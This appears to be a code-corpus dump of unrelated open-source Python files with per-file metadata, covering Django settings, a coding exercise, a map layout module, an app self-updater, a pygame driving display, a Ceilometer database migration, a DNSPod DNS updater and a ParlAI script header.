from django.contrib.messages import constants as messages
MESSAGE_TAGS ={
messages.DEBUG: 'debug',
messages.INFO: 'info',
messages.SUCCESS: 'success',
messages.WARNING: 'warning',
messages.ERROR: 'error'
}
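# Illustrative note (not part of the original settings): the strings above
# replace Django's default level tags, so a view that calls, for example,
#
#     from django.contrib import messages
#     messages.success(request, "Vote recorded.")
#
# exposes "success" to templates via message.tags, which the templates can use
# as a CSS class. The view and message text are assumptions for the example.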
| 25.52349
| 91
| 0.692348
|
aedcf66269f2d205a5f0b45b573103b9527fbae4
| 2,933
|
py
|
Python
|
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | 2
|
2022-03-10T03:49:14.000Z
|
2022-03-14T00:49:54.000Z
|
python/misc/whos_the_oldest.py
|
christopher-burke/warmups
|
140c96ada87ec5e9faa4622504ddee18840dce4a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
"""Find the oldest. Who's The Oldest?
Given a dictionary containing the names and ages of a group of people,
return the name of the oldest person.
Source:
https://edabit.com/challenge/3A6x5GjWmT4t8pssL"""
def oldest(people: dict) -> str:
"""Find the oldest person in people dict."""
oldest_age = max(people.values())
oldest_person = [person for person,
age in people.items()
if age == oldest_age][0]
return oldest_person
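# Equivalent alternative (added sketch, not part of the original solution):
# max() with a key function collapses the two-step lookup into one expression.
def oldest_alt(people: dict) -> str:
    """Find the oldest person using max() with a key function."""
    return max(people, key=people.get)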
def main():
"""Run sample oldest functions. Do not import."""
assert oldest({'Charlotte': 53, 'Oliver': 15, 'Henry': 18,
'Gabriel': 46, 'Violet': 13}) == "Charlotte"
assert oldest({'Grayson': 50, 'Imogen': 63, 'Logan': 21,
'Daniel': 64, 'Rory': 19}) == "Daniel"
assert oldest({'Josh': 78, 'Adam': 63, 'Aria': 65,
'Grace': 51, 'Bella': 37}) == "Josh"
assert oldest({'Alex': 9, 'Jayden': 18, 'Julia': 43,
'Penelope': 32, 'Ella': 34}) == "Julia"
assert oldest({'Sam': 65, 'Joseph': 60, 'Mia': 41,
'Thomas': 31, 'Rebecca': 5}) == "Sam"
assert oldest({'Eden': 64, 'Archie': 18, 'Olivia': 32,
'Kai': 84, 'Harry': 14}) == "Kai"
assert oldest({'Anna': 67, 'Elijah': 10, 'Cole': 31,
'Andrew': 24, 'Elliot': 77}) == "Elliot"
assert oldest({'Innes': 77, 'Lilly': 11, 'Hallie': 41,
'Nina': 66, 'Ryan': 9}) == "Innes"
assert oldest({'Isla': 73, 'Elsie': 6, 'Frankie': 36,
'Robbie': 75, 'Kayla': 9}) == "Robbie"
assert oldest({'Jack': 64, 'Jacob': 33, 'Tommy': 17,
'Finn': 5, 'Isaac': 13}) == "Jack"
assert oldest({'Carson': 81, 'Charlie': 33, 'Riley': 28,
'Maria': 39, 'Sadie': 67}) == "Carson"
assert oldest({'Amy': 70, 'Owen': 11, 'Matilda': 64,
'Lexi': 37, 'Lena': 26}) == "Amy"
assert oldest({'Lola': 45, 'Tyler': 23, 'Hope': 4,
'Phoebe': 86, 'Freya': 44}) == "Phoebe"
assert oldest({'Hollie': 48, 'Harris': 24, 'Ava': 72,
'Alfie': 9, 'Louis': 47}) == "Ava"
assert oldest({'Erica': 32, 'Eve': 82, 'Harper': 74,
'Summer': 38, 'Ben': 72}) == "Eve"
assert oldest({'Michael': 63, 'Jessica': 65, 'Reuben': 25,
'Aiden': 82, 'Emily': 18}) == "Aiden"
assert oldest({'Brooke': 8, 'Lucy': 44, 'Cooper': 33,
'Ellie': 82, 'Millie': 7}) == "Ellie"
assert oldest({'Piper': 10, 'Quinn': 62, 'David': 20,
'John': 61, 'Noah': 17}) == "Quinn"
assert oldest({'Cara': 5, 'Max': 81, 'Lucas': 62,
'Sophie': 71, 'Amelia': 79}) == "Max"
assert oldest({'Leo': 29, 'Clara': 8, 'Florence': 69,
'Lewis': 38, 'James': 47}) == "Florence"
print('Passed.')
if __name__ == "__main__":
main()
| 43.132353
| 70
| 0.492329
|
e05a8f197347fe4ce02b71f8a88eb3115ceb99a5
| 1,932
|
py
|
Python
|
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
dotmatrix/visualization/layout.py
|
alvinlao/dot-matrix-map
|
32925d5ede38c634ab53b966d779786366a1855c
|
[
"MIT"
] | null | null | null |
from enum import Enum
class Dimension(Enum):
WIDTH = 1
HEIGHT = 2
config_key = {
Dimension.WIDTH: {
'size': lambda c: c['width'],
'padding-ratio': lambda c: c['padding-horizontal'],
'num_dots': lambda c: len(c['dots'][0]),
},
Dimension.HEIGHT: {
'size': lambda c: c['height'],
'padding-ratio': lambda c: c['padding-vertical'],
'num_dots': lambda c: len(c['dots']),
},
}
def get(config, dimension, attribute):
return config_key[dimension][attribute](config)
def padding(config, dimension):
if fixed_dimension(config) == dimension:
return fixed_padding(config, dimension)
else:
return free_padding(config, dimension)
def fixed_padding(config, dimension):
size = get(config, dimension, 'size')
padding_ratio = get(config, dimension, 'padding-ratio')
return size * padding_ratio
def free_padding(config, dimension):
size = get(config, dimension, 'size')
return (size - used_space(config, dimension)) / 2
def used_space(config, dimension):
num_dots = get(config, dimension, 'num_dots')
return num_dots * dot_slot_size(config)
def allocated_space(config, dimension):
size = get(config, dimension, 'size')
return size - (2 * fixed_padding(config, dimension))
def dot_slot_size(config):
return min(
fixed_dot_slot_size(config, Dimension.WIDTH),
fixed_dot_slot_size(config, Dimension.HEIGHT))
def fixed_dot_slot_size(config, dimension):
space = allocated_space(config, dimension)
num_dots = get(config, dimension, 'num_dots')
return space / num_dots
def fixed_dimension(config):
return min(
Dimension.WIDTH,
Dimension.HEIGHT,
key=lambda d: fixed_dot_slot_size(config, d))
def free_dimension(config):
return max(
Dimension.WIDTH,
Dimension.HEIGHT,
key=lambda d: fixed_dot_slot_size(config, d))
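# Illustrative sketch (not part of the original module): the shape of the
# config dict this module expects, inferred from config_key above. The
# numbers are arbitrary assumptions chosen for the example.
def _example_layout():
    config = {
        'width': 800,
        'height': 400,
        'padding-horizontal': 0.05,
        'padding-vertical': 0.05,
        'dots': [[0] * 40 for _ in range(10)],  # 10 rows x 40 columns of dots
    }
    # The width is the constraining (fixed) dimension here, so dots are sized
    # from it and the vertical padding absorbs the leftover space.
    return {
        'dot_slot_size': dot_slot_size(config),
        'padding_width': padding(config, Dimension.WIDTH),
        'padding_height': padding(config, Dimension.HEIGHT),
    }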
| 24.455696
| 59
| 0.661491
|
7c991e5dc9febaf878ecae6dda5890e5e085f918
| 1,844
|
py
|
Python
|
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | null | null | null |
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | 2
|
2021-12-20T01:39:05.000Z
|
2022-01-19T15:06:52.000Z
|
python/updater.py
|
nattyan-tv/ark-server-utility
|
32eb9b4b5100630b13ce017d46b7ba635b61a915
|
[
"MIT"
] | null | null | null |
import sys
import requests
import zipfile
import shutil
import os
from tkinter import messagebox
url='https://github.com/nattyan-tv/ark-server-utility/releases/latest/download/ark-server-utility.zip'
filename='ark-server-utility.zip'
path = "./update"
def main():
print(sys.argv)
if len(sys.argv) >= 2 and sys.argv[1] == "true":
try:
urlData = requests.get(url).content
with open(filename ,mode='wb') as f:
f.write(urlData)
if not os.path.exists(path):
with zipfile.ZipFile(filename) as zip:
zip.extractall(path)
else:
shutil.rmtree(path)
with zipfile.ZipFile(filename) as zip:
zip.extractall(path)
for i in range(len(os.listdir(path))):
print([os.listdir(path)[i],os.path.isfile(f"{path}/{os.listdir(path)[i]}")])
if os.path.isfile(f"{path}/{os.listdir(path)[i]}"):
shutil.copy2(f"{path}/{os.listdir(path)[i]}", "./")
elif os.path.isdir(f"{path}/{os.listdir(path)[i]}"):
shutil.rmtree(f"./{os.listdir(path)[i]}")
shutil.copytree(f"{path}/{os.listdir(path)[i]}", f"./{os.listdir(path)[i]}")
os.remove(f"./{filename}")
messagebox.showinfo("アップデート成功", "アップデートに成功しました。")
return
except BaseException as err:
messagebox.showerror("アップデート失敗", f"アップデート操作中にエラーが発生しました。\n{err}")
rt = messagebox.askretrycancel("アップデート失敗", "再試行しますか?")
if rt == True:
main()
return
else:
return
else:
messagebox.showerror("アップデーター", "アップデートはARK: Server Utilityから行えます。")
return
if __name__ == "__main__":
main()
| 35.461538
| 102
| 0.541757
|
2f79c4b3137a75c5f6533dd6dbc228a470031e1d
| 9,680
|
py
|
Python
|
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | 1
|
2021-03-01T19:43:12.000Z
|
2021-03-01T19:43:12.000Z
|
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | null | null | null |
tools/screen_manager.py
|
PDillis/coiltraine
|
a682aa62af5f6ecb95a837d33b70d893d3d261f6
|
[
"MIT"
] | null | null | null |
import colorsys
import pygame
import numpy as np
from random import randint
from skimage import transform as trans
import scipy
import cv2
clock = pygame.time.Clock()
rsrc = \
[[43.45456230828867, 118.00743250075844],
[104.5055617352614, 69.46865203761757],
[114.86050156739812, 60.83953551083698],
[129.74572757609468, 50.48459567870026],
[132.98164627363735, 46.38576532847949],
[301.0336906326895, 98.16046448916306],
[238.25686790036065, 62.56535881619311],
[227.2547443287154, 56.30924933427718],
[209.13359962247614, 46.817221154818526],
[203.9561297064078, 43.5813024572758]]
rdst = \
[[10.822125594094452, 1.42189132706374],
[21.177065426231174, 1.5297552836484982],
[25.275895776451954, 1.42189132706374],
[36.062291434927694, 1.6376192402332563],
[40.376849698318004, 1.42189132706374],
[11.900765159942026, -2.1376192402332563],
[22.25570499207874, -2.1376192402332563],
[26.785991168638553, -2.029755283648498],
[37.033067044190524, -2.029755283648498],
[41.67121717733509, -2.029755283648498]]
tform3_img = trans.ProjectiveTransform()
tform3_img.estimate(np.array(rdst), np.array(rsrc))
def draw_vbar_on(img,bar_intensity,x_pos,color=(0,0,255)):
bar_size = int(img.shape[1]/6 * bar_intensity)
initial_y_pos = img.shape[0] - img.shape[0] // 6  # integer division keeps the index usable in Python 3
#print bar_intensity
for i in range(bar_size):
if bar_intensity > 0.0:
y = initial_y_pos - i
for j in range(20):
img[y , x_pos +j] = color
def generate_ncolors(num_colors):
color_pallet = []
for i in range(0, 360, 360 // num_colors):  # range() requires an integer step in Python 3
hue = i
saturation = 90 + float(randint(0, 1000)) / 1000 * 10
lightness = 50 + float(randint(0, 1000)) / 1000 * 10
color = colorsys.hsv_to_rgb(float(hue) / 360.0, saturation / 100, lightness / 100)
color_pallet.append(color)
# addColor(c);
return color_pallet
def get_average_over_interval(vector, interval):
avg_vector = []
for i in range(0, len(vector), interval):
initial_train = i
final_train = i + interval
avg_point = sum(vector[initial_train:final_train]) / interval
avg_vector.append(avg_point)
return avg_vector
def get_average_over_interval_stride(vector, interval, stride):
avg_vector = []
for i in range(0, len(vector) - interval, stride):
initial_train = i
final_train = i + interval
avg_point = sum(vector[initial_train:final_train]) / interval
avg_vector.append(avg_point)
return avg_vector
def perspective_tform(x, y):
p1, p2 = tform3_img((x, y))[0]
return p2, p1
# ***** functions to draw lines *****
def draw_pt(img, x, y, color, sz=1):
row, col = perspective_tform(x, y)
if 0 <= row < img.shape[0] and 0 <= col < img.shape[1]:
img[int(row - sz):int(row + sz), int(col - sz - 65):int(col + sz - 65)] = color
def draw_path(img, path_x, path_y, color):
for x, y in zip(path_x, path_y):
draw_pt(img, x, y, color)
# ***** functions to draw predicted path *****
def calc_curvature(v_ego, angle_steers, angle_offset=0):
deg_to_rad = np.pi / 180.
slip_fator = 0.0014 # slip factor obtained from real data
steer_ratio = 15.3
wheel_base = 2.67
angle_steers_rad = (angle_steers - angle_offset) * deg_to_rad
curvature = angle_steers_rad / (steer_ratio * wheel_base * (1. + slip_fator * v_ego ** 2))
return curvature
def calc_lookahead_offset(v_ego, angle_steers, d_lookahead, angle_offset=0):
# *** this function returns the lateral offset given the steering angle, speed and the lookahead distance
curvature = calc_curvature(v_ego, angle_steers, angle_offset)
# clip is to avoid arcsin NaNs due to too sharp turns
y_actual = d_lookahead * np.tan(np.arcsin(np.clip(d_lookahead * curvature, -0.999, 0.999)) / 2.)
return y_actual, curvature
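# Illustrative sketch (not part of the original file): querying the predicted
# lateral offset at a single lookahead distance. The speed and steering angle
# are arbitrary assumptions chosen for the example.
def _example_lookahead_offset():
    y_offset, curvature = calc_lookahead_offset(v_ego=10.0, angle_steers=15.0, d_lookahead=20.0)
    return y_offset, curvature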
def draw_path_on(img, speed_ms, angle_steers, color=(0, 0, 255)):
path_x = np.arange(0., 50.1, 0.5)
path_y, _ = calc_lookahead_offset(speed_ms, angle_steers, path_x)
draw_path(img, path_x, path_y, color)
class ScreenManager(object):
def __init__(self, load_steer=False):
pygame.init()
# Put some general parameters
self._render_iter = 2000
self._speed_limit = 50.0
if load_steer:
self._wheel = cv2.imread('./drive_interfaces/wheel.png') # ,cv2.IMREAD_UNCHANGED)
self._wheel = cv2.resize(self._wheel, (int(0.08 * self._wheel.shape[0]), int(0.08 * self._wheel.shape[1])))
# If we were to load the steering wheel load it
# take into consideration the resolution when ploting
# TODO: Resize properly to fit the screen ( MAYBE THIS COULD BE DONE DIRECTLY RESIZING screen and keeping SURFACES)
def start_screen(self, resolution, aspect_ratio, scale=1):
self._resolution = resolution
self._aspect_ratio = aspect_ratio
self._scale = scale
size = (resolution[0] * aspect_ratio[0], resolution[1] * aspect_ratio[1])
self._screen = pygame.display.set_mode((size[0] * scale, size[1] * scale), pygame.DOUBLEBUF)
# self._screen.set_alpha(None)
pygame.display.set_caption("Human/Machine - Driving Software")
self._camera_surfaces = []
for i in range(aspect_ratio[0] * aspect_ratio[1]):
camera_surface = pygame.surface.Surface(resolution, 0, 24).convert()
self._camera_surfaces.append(camera_surface)
def paint_on_screen(self, size, content, color, position, screen_position):
myfont = pygame.font.SysFont("monospace", size * self._scale, bold=True)
position = (position[0] * self._scale, position[1] * self._scale)
final_position = (position[0] + self._resolution[0] * (self._scale * (screen_position[0])), \
position[1] + (self._resolution[1] * (self._scale * (screen_position[1]))))
content_to_write = myfont.render(content, 1, color)
self._screen.blit(content_to_write, final_position)
def set_array(self, array, screen_position, position=(0, 0), scale=None):
if scale is None:
scale = self._scale
if array.shape[0] != self._resolution[1] or array.shape[1] != self._resolution[0]:
array = scipy.misc.imresize(array, [self._resolution[1], self._resolution[0]])
# print array.shape, self._resolution
final_position = (position[0] + self._resolution[0] * (scale * (screen_position[0])), \
position[1] + (self._resolution[1] * (scale * (screen_position[1]))))
# pygame.surfarray.array_colorkey(self._camera_surfaces[screen_number])
self._camera_surfaces[screen_position[0] * screen_position[1]].set_colorkey((255, 0, 255))
pygame.surfarray.blit_array(self._camera_surfaces[screen_position[0] * screen_position[1]],
array.swapaxes(0, 1))
camera_scale = pygame.transform.scale(self._camera_surfaces[screen_position[0] * screen_position[1]],
(int(self._resolution[0] * scale), int(self._resolution[1] * scale)))
self._screen.blit(camera_scale, final_position)
def draw_wheel_on(self, steer, screen_position):
cols, rows, c = self._wheel.shape
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -90 * steer, 1)
rot_wheel = cv2.warpAffine(self._wheel, M, (cols, rows), borderMode=cv2.BORDER_CONSTANT, borderValue=(0, 0, 0))
# scale = 0.5
position = (self._resolution[0] / 2 - cols / 2, int(self._resolution[1] / 1.5) - rows / 2)
# print position
wheel_surface = pygame.surface.Surface((rot_wheel.shape[1], rot_wheel.shape[0]), 0, 24).convert()
# print array.shape, self._resolution
# final_position = (position[0] + self._resolution[0]*(scale*(screen_number%3)),\
# position[1] + (self._resolution[1]*(scale*(screen_number/3))))
# pygame.surfarray.array_colorkey(self._camera_surfaces[screen_number])
wheel_surface.set_colorkey((0, 0, 0))
pygame.surfarray.blit_array(wheel_surface, rot_wheel.swapaxes(0, 1))
self._screen.blit(wheel_surface, position)
# This one plot the nice wheel
def plot_camera(self, sensor_data, screen_position=[0, 0]):
if sensor_data.shape[2] < 3:
sensor_data = np.stack((sensor_data,) * 3, axis=2)
sensor_data = np.squeeze(sensor_data)
# print sensor_data.shape
self.set_array(sensor_data, screen_position)
pygame.display.flip()
def plot_camera_steer(self, sensor_data, steer, screen_position=[0, 0]):
if sensor_data.shape[2] < 3:
sensor_data = np.stack((sensor_data,) * 3, axis=2)
sensor_data = np.squeeze(sensor_data)
draw_path_on(sensor_data, 20, -steer * 10.0, (0, 255, 0))
self.set_array(sensor_data, screen_position)
pygame.display.flip()
def plot3camrcnoise(self, sensor_data, \
steer, noise, difference, \
screen_number=0):
# Define our fonts
# draw_path_on(img, 10, -angle_steers*40.0)
draw_path_on(sensor_data, 20, -steer * 20.0, (255, 0, 0))
draw_path_on(sensor_data, 20, -noise * 20.0, (0, 255, 0))
draw_path_on(sensor_data, 20, -difference * 20.0, (0, 0, 255))
#pygame.image.save(self._screen, "footage_offline/imgcamera" + str(self._render_iter) +".png")
self.set_array(sensor_data, screen_number)
self._render_iter += 1
pygame.display.flip()
| 34.204947
| 119
| 0.651343
|
462ba589dc818c120ac20739ea710091f3063832
| 1,486
|
py
|
Python
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 40
|
2020-10-20T15:56:35.000Z
|
2022-02-22T14:48:09.000Z
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 55
|
2020-10-21T15:37:44.000Z
|
2022-02-10T02:44:18.000Z
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 9
|
2021-01-15T15:53:25.000Z
|
2022-03-31T23:42:12.000Z
|
"""
Tests whether MissingEmbeddings works
"""
from inspect import cleandoc
from testfixtures import compare
from demo.feature_overview.missing_embeddings import MissingEmbeddings, MissingEmbeddingsInfo
from example_pipelines.healthcare import custom_monkeypatching
from mlinspect._pipeline_inspector import PipelineInspector
def test_missing_embeddings():
"""
Tests whether MissingEmbeddings works for joins
"""
test_code = cleandoc("""
import pandas as pd
from example_pipelines.healthcare.healthcare_utils import MyW2VTransformer
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
word_to_vec = MyW2VTransformer(min_count=2, size=2, workers=1)
encoded_data = word_to_vec.fit_transform(df)
""")
inspector_result = PipelineInspector \
.on_pipeline_from_string(test_code) \
.add_required_inspection(MissingEmbeddings(10)) \
.add_custom_monkey_patching_module(custom_monkeypatching) \
.execute()
inspection_results = list(inspector_result.dag_node_to_inspection_results.values())
missing_embeddings_output = inspection_results[0][MissingEmbeddings(10)]
expected_result = None
compare(missing_embeddings_output, expected_result)
missing_embeddings_output = inspection_results[1][MissingEmbeddings(10)]
expected_result = MissingEmbeddingsInfo(2, ['cat_b', 'cat_c'])
compare(missing_embeddings_output, expected_result)
| 37.15
| 93
| 0.744953
|
887d12d7ef6f50acf936b685948f73adca051000
| 4,590
|
py
|
Python
|
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | 1
|
2015-02-26T03:23:09.000Z
|
2015-02-26T03:23:09.000Z
|
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate import ForeignKeyConstraint
from sqlalchemy import Column
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from ceilometer.storage.sqlalchemy import migration
def upgrade(migrate_engine):
meta = MetaData(bind=migrate_engine)
event_type = Table(
'event_type', meta,
Column('id', Integer, primary_key=True),
Column('desc', String(255), unique=True),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
event_type.create()
event = Table('event', meta, autoload=True)
unique_name = Table('unique_name', meta, autoload=True)
# Event type is a specialization of Unique name, so
# we insert into the event_type table all the distinct
# unique names from the event.unique_name field along
# with the key from the unique_name table, and
# then rename the event.unique_name field to event.event_type
conn = migrate_engine.connect()
sql = ("INSERT INTO event_type "
"SELECT unique_name.id, unique_name.key FROM event "
"INNER JOIN unique_name "
"ON event.unique_name_id = unique_name.id "
"GROUP BY unique_name.id")
conn.execute(sql)
conn.close()
# Now we need to drop the foreign key constraint, rename
# the event.unique_name column, and re-add a new foreign
# key constraint
params = {'columns': [event.c.unique_name_id],
'refcolumns': [unique_name.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "event_ibfk_1"
fkey = ForeignKeyConstraint(**params)
fkey.drop()
Column('event_type_id', Integer).create(event)
# Move data from unique_name_id column into event_type_id column
# and delete the entry from the unique_name table
query = select([event.c.id, event.c.unique_name_id])
for key, value in migration.paged(query):
event.update().where(event.c.id == key)\
.values({"event_type_id": value}).execute()
unique_name.delete()\
.where(unique_name.c.id == key).execute()
params = {'columns': [event.c.event_type_id],
'refcolumns': [event_type.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "_".join(('fk', 'event_type', 'id'))
fkey = ForeignKeyConstraint(**params)
fkey.create()
event.c.unique_name_id.drop()
def downgrade(migrate_engine):
meta = MetaData(bind=migrate_engine)
event_type = Table('event_type', meta, autoload=True)
event = Table('event', meta, autoload=True)
unique_name = Table('unique_name', meta, autoload=True)
# Re-insert the event type table records into the old
# unique_name table.
conn = migrate_engine.connect()
sql = ("INSERT INTO unique_name "
"SELECT event_type.id, event_type.desc FROM event_type")
conn.execute(sql)
conn.close()
# Drop the foreign key constraint to event_type, drop the
# event_type table, rename the event.event_type column to
# event.unique_name, and re-add the old foreign
# key constraint
params = {'columns': [event.c.event_type_id],
'refcolumns': [event_type.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "_".join(('fk', 'event_type', 'id'))
fkey = ForeignKeyConstraint(**params)
fkey.drop()
event_type.drop()
Column('unique_name_id', Integer).create(event)
# Move data from event_type_id column to unique_name_id column
query = select([event.c.id, event.c.event_type_id])
for key, value in migration.paged(query):
event.update().where(event.c.id == key)\
.values({"unique_name_id": value}).execute()
event.c.event_type_id.drop()
params = {'columns': [event.c.unique_name_id],
'refcolumns': [unique_name.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = 'event_ibfk_1'
fkey = ForeignKeyConstraint(**params)
fkey.create()
| 37.622951
| 75
| 0.675163
|
fed90976c491e9644672fdf0ac0a9124a9ae4257
| 5,383
|
py
|
Python
|
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | 1
|
2018-12-02T13:56:03.000Z
|
2018-12-02T13:56:03.000Z
|
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | null | null | null |
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
DNSPOD API
Helper library for managing DNS records through the DNSPod API.
http://www.dnspod.cn/docs/domains.html
@author: New Future
"""
import json
import logging as log
try:
# python 2
from httplib import HTTPSConnection
import urllib
except ImportError:
# python 3
from http.client import HTTPSConnection
import urllib.parse as urllib
__author__ = 'New Future'
ID = "token id"
TOKEN = "token key"
PROXY = None # proxy host for the HTTPS connection, if any
API_SITE = "dnsapi.cn"
API_METHOD = "POST"
def request(action, param=None, **params):
"""
Send a request to the DNSPod API and return the decoded JSON response.
"""
if param:
params.update(param)
params.update({'login_token': "%s,%s" % (ID, TOKEN), 'format': 'json'})
log.debug("%s : params:%s", action, params)
if PROXY:
conn = HTTPSConnection(PROXY)
conn.set_tunnel(API_SITE, 443)
else:
conn = HTTPSConnection(API_SITE)
conn.request(API_METHOD, '/' + action, urllib.urlencode(params),
{"Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
res = response.read()
conn.close()
if response.status < 200 or response.status >= 300:
raise Exception(res)
else:
data = json.loads(res.decode('utf8'))
if not data:
raise Exception("empty response")
elif data.get("status", {}).get("code") == "1":
return data
else:
raise Exception(data.get('status', {}))
def get_domain_info(domain):
"""
Split the domain into subdomain and registered (main) domain, and look up the main domain's ID.
"""
domain_split = domain.split('.')
if len(domain_split) == 3: # exactly three labels: sub.domain.tld
sub, main = domain_split[0], domain_split[1] + '.' + domain_split[2]
did = get_domain_id(main)
else: # more than three labels: probe the API, starting from the last two labels and adding one label at a time
main = domain_split.pop()
while domain_split:
main = domain_split.pop() + '.' + main
did = get_domain_id(main)
if did:
sub = ".".join(domain_split)
break
else:
return None, None
if not sub: # root domain, see https://github.com/NewFuture/DDNS/issues/9
sub = '@'
return did, sub
def get_domain_id(domain):
"""
Get the ID of a domain.
http://www.dnspod.cn/docs/domains.html#domain-info
"""
if not hasattr(get_domain_id, "domain_list"):
get_domain_id.domain_list = {} # function attribute used as a cache of already-resolved ids
if domain in get_domain_id.domain_list:
# return the cached id to avoid another API request
return get_domain_id.domain_list[domain]
else:
info = request('Domain.Info', domain=domain)
if info and info.get('status', {}).get('code') == "1":
did = info.get("domain", {}).get("id")
if did:
get_domain_id.domain_list[domain] = did
return did
def get_records(did, **conditions):
"""
Get record IDs.
Returns every record that matches the given conditions as a dict.
TODO: add paging for domains with more than 3000 records.
http://www.dnspod.cn/docs/records.html#record-list
"""
if not hasattr(get_records, "records"):
get_records.records = {} # function attribute used as a cache of already-fetched records
get_records.keys = ("id", "name", "type", "line",
"line_id", "enabled", "mx", "value")
if not did in get_records.records:
get_records.records[did] = {}
data = request('Record.List', domain_id=did)
if data:
for record in data.get('records'):
get_records.records[did][record["id"]] = {
k: v for (k, v) in record.items() if k in get_records.keys}
records = {}
for (did, record) in get_records.records[did].items():
for (k, value) in conditions.items():
if record.get(k) != value:
break
else: # for else push
records[did] = record
return records
def update_record(domain, value, record_type="A"):
"""
Update the record for the domain, creating it if it does not exist.
"""
log.debug(">>>>>%s(%s)", domain, record_type)
domainid, sub = get_domain_info(domain)
if not domainid:
raise Exception("invalid domain: [ %s ] " % domain)
records = get_records(domainid, name=sub, type=record_type)
result = {}
if records: # update
# http://www.dnspod.cn/docs/records.html#record-modify
for (did, record) in records.items():
if record["value"] != value:
log.debug(sub, record)
res = request('Record.Modify', record_id=did, record_line=record["line"].encode(
"utf-8"), value=value, sub_domain=sub, domain_id=domainid, record_type=record_type)
if res:
get_records.records[domainid][did]["value"] = value
result[did] = res.get("record")
else:
result[did] = "update fail!\n" + str(res)
else:
result[did] = domain
else: # create
# http://www.dnspod.cn/docs/records.html#record-create
res = request("Record.Create", domain_id=domainid, value=value,
sub_domain=sub, record_type=record_type, record_line="默认", ttl=600)
if res:
did = res.get("record")["id"]
get_records.records[domainid][did] = res.get("record")
get_records.records[domainid][did].update(
value=value, sub_domain=sub, record_type=record_type)
result = res.get("record")
else:
result = domain + " created fail!"
return result
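# Illustrative usage sketch (not part of the original module). Real DNSPod
# credentials and a domain you control are required; the values below are
# placeholders, not working credentials.
def _example_ddns_update():
    global ID, TOKEN
    ID = '12345'              # placeholder token id
    TOKEN = 'your-token-key'  # placeholder token key
    # Point the A record of the (hypothetical) domain at a new address.
    return update_record('www.example.com', '203.0.113.10', record_type='A')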
| 30.76
| 103
| 0.565298
|
dfbca10a1b7b3c043fbd9c7dc873e0c7144eb64a
| 25,601
|
py
|
Python
|
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Training script for ParlAI.
The standard way to train a model. After training, also computes validation
and test error.
The user must provide a model (with ``--model``) and a task (with ``--task``).
Examples
--------
.. code-block:: shell
python -m parlai.scripts.train_model -m ir_baseline -t dialog_babi:Task:1 -mf /tmp/model
